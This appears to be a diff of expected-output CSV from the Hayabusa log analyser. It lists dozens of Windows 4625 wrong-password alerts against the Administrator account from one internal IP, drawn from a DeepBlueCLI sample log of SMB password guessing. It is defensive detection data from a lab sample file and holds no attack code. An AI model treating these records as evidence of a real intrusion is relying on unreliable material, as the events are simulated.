+2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jCqb6TVV14hVX3NY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3qJsJrxVARedOdd3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s7iNkrkBNEbXPK0B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bio4zciNRolyeHc1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IFf1vN5MgAIsdZvx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zWhgUQSWAycVdYoS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ugHUJZuKHYfUHXWS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AUeUmYa72BzHfyhK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ksydur7W1mUoOZAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YNIzopnsXH6OjcUs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SQljJkaWs8bcaOI1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1jejn6ZMo564m7ok | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KrpBO1SCHpt27CRM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ifPePsozBYRLCU3k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vve4r8QwaMLKrrcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i9ArElR5k8yLefWu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4a1Y126C516BaGcz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VL7PnrO2dLsEbebQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GGTlLZ8J9f2PtiuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6sVwPFs7bhJgJwRt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dgQNHL9etdHdRw9Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mjZrWpJlN2CwbxFc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72lmrp6neWGKAURB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CnTi5dgoWunYutJ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vi2fTl07llsJEYyt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hohh8KS1eYtojEya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RsuC8F95UmsOSKvs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: be8UJ0EN7XS5r0b6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CgJlVYanwWKAhJ7O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zthqCIkr1nKtqcCj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tzmi8I402j71q5Wg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m0U3NYl8QEbgeJry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uJJ1FOUIBInGkKPQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bu0X5RisszAHEs0X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ZZfs8zqT2bLOAHq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qkpO31LzJfaYLyjB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BJrIsRTWUwPuySR7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHNccqtwl9Y9IhLq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: APlvDcMzvms0gehT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AxOERGKI75RarVNZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uvzwd5qqC7og49yW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lksm3o2g0YhFnm4Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zwXhSPCV4qHVF9Rc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z31baZ4G36idFMeX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WK63qylKunHZB3zS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ALJxKGwyZz7JDpRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q8tioTO3TEIzdzY0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5dIKTgQkvPKzKJoZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ta0IMrlArbgONhDG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MKNUu4624Rvr87kK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n7jIL2FkXzWqvWTJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oJMVh1zdQt7EikVj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OqvximSAPlXZ3An | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tr2GQ1F3jccpWrsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CCmbvQXXXzhHOdMG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qTp1BwPv8XiK2mrG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rnb19AXxM5ArcLxX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUS5CKq2W1rkq46d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FzKSUVdsC5eENWDd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QFL07Mhy4iw5psBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cMpitnzLXDLSXL73 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RSfaPdcsiRQoGYYm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PJRP4bS9Qgg06Z5P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3Z4veMNKngHUDoRf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmF0YFgAMSRotb1y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DmrbO3dZw46DgmZQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qg4CMwLpfzLrvDPj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BKDKUXNNhuSqRiTE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cBocrjNXjmuPCKRJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: loCrAXibgVxcOtCM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZ7pHOJeOExrON2E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MeucKpaodpmdsqhD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LRlmBeBlV6n4MQyo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E8FYOF6HxJHqm7GW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
